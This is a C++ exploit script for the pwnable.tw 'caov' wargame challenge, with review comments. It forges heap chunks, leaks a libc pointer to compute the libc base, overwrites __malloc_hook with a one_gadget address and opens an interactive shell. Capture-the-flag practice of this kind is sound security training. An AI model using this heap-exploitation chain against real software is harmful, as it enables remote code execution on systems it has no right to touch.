#include <pwntools>
#include <string>
#include <iostream>
// NOTE(review): file-scope using-directive pulls the whole pwn namespace
// into scope; acceptable for a one-off script, not for a header.
using namespace pwn;
// Process io("./caov");
// The connection object is a global, so it is constructed before main()
// runs — presumably Remote connects in its constructor; TODO confirm.
Remote io("chall.pwnable.tw", 10306);
// Drives the remote menu: picks choice 2, then answers the name and
// length prompts. The key and value prompts are answered only when
// keyLen is non-zero; with keyLen == 0 the function returns right after
// sending the length.
void set(std::string name, std::string key,
         uint32_t keyLen, int64_t value) {
    const std::string lenText = std::to_string(keyLen);
    io.sendlineafter("choice: ", "2");
    io.sendafter("name: ", name);
    io.sendlineafter("length: ", lenText);
    if (keyLen != 0) {
        io.sendlineafter("Key: ", key);
        io.sendlineafter("Value: ", std::to_string(value));
    }
}
// Declared but never referenced in this file. Presumably mirrors the
// record layout of the remote program (key pointer, value, change
// counter, calendar fields) — TODO confirm against the target.
struct Data {
    char *key;
    uint64_t value;
    uint64_t change_count;
    int year, month, day, hour, min, sec;   // calendar fields, by name only
};
// Target-specific values, hard-coded for one particular build of the
// remote binary; nothing here is derived at runtime.
uint64_t offset_Data{0x6032a0};
uint64_t offset_Name{offset_Data + 0x20};   // 0x6032c0
uint64_t junk{0x41414141};                  // filler: four 'A' bytes
uint64_t fake_chunk_addr{0x603285};
// Driver for the remote declared at file scope. Everything here is tied
// to one specific build of the target binary and its libc (see the
// hard-coded offsets); only libc_base is derived from a value read at
// runtime.
int main() {
    // Answer the program's initial name / key / value prompts.
    io.recvuntil("name: ");
    io.sendline("HKHK");
    io.sendlineafter("key: ", "HK");
    io.sendlineafter("value: ",std::to_string(0x1337));
    /* set( name, key , keyLen, val) */
    // Payloads are fixed sequences of 8-byte words assembled with flat()
    // (from the pwntools header, assumed) and delivered through set().
    std::string payload;
    payload = flat(
        0UL, 0x71UL,
        offset_Data, 0UL,
        0UL, 0x21UL,
        junk, junk,
        junk, junk,
        junk, junk,
        offset_Name+0x10, 0L,
        junk, 0x81L,
        0L, 0x21L,
        "\n"
    ); set(payload, "HKHK", 0 , 0); // 0
    payload = flat(
        0L, 0x71L,
        fake_chunk_addr, 0L,
        0L, 0L,
        fake_chunk_addr - 0x5, junk,
        junk, junk,
        junk, junk,
        0L, "\n"
    ); set(payload, "HK\n", 0x67, 0); //1
    std::string payload2(11, 0);            // eleven NUL bytes, then one word
    payload2 += flat(offset_Name + 0x30);
    set("HK\n",payload2,0x67,0); //2
    // After choosing 1, wait for "Key: ", read 6 bytes, zero-pad to 8
    // (resize() fills with '\0') and decode them as one qword via u64
    // (presumably little-endian — from the pwntools header).
    io.sendlineafter("choice: ","1");
    io.recvuntil("Key: ");
    std::string leak_str = io.recv(6);
    leak_str.resize(8);
    uint64_t libc_stderr_leak = u64(leak_str);
    // Both offsets are specific to the remote's libc build.
    uint64_t libc_base = libc_stderr_leak - 0x3c4540;
    uint64_t offset_malloc_hook = 0x3c3b10;
    printf("[+] Libc base: %p\n",(void *)libc_base);
    std::string final_payload_1;
    final_payload_1 = flat(
        0UL, 0x71UL,
        offset_Data, 0UL,
        0UL, 0x21UL,
        fake_chunk_addr - 0x5, junk,
        junk, 0x21L,
        junk, junk,
        offset_Name+0x10, 0L,
        junk, 0x81L,
        0L, 0x21L,
        "\n"
    ); set(final_payload_1, "hk", 0, 0);
    // From here on the words depend on the runtime-derived libc_base.
    std::string final_payload_2;
    final_payload_2 = flat(
        0UL, 0x71UL,
        libc_base + offset_malloc_hook - 0x23, 0L,
        0UL, 0x21UL,
        offset_Name + 0x20, junk,
        junk, 0x21L,
        "\n"
    );
    set(final_payload_2, "hk",0,0);
    set("hk\n","hk\n",0x67,0);
    uint64_t one_gadget = libc_base + 0xef6c4;   // libc-build-specific offset
    std::string malloc_hook_overwrite;
    malloc_hook_overwrite = flat(
        "AAA", junk, junk,
        one_gadget
    );set("hk\n",malloc_hook_overwrite, 0x67, 0);
    // Hands the connection over to the terminal (assumed from the name).
    io.interactive();
    return 0;
}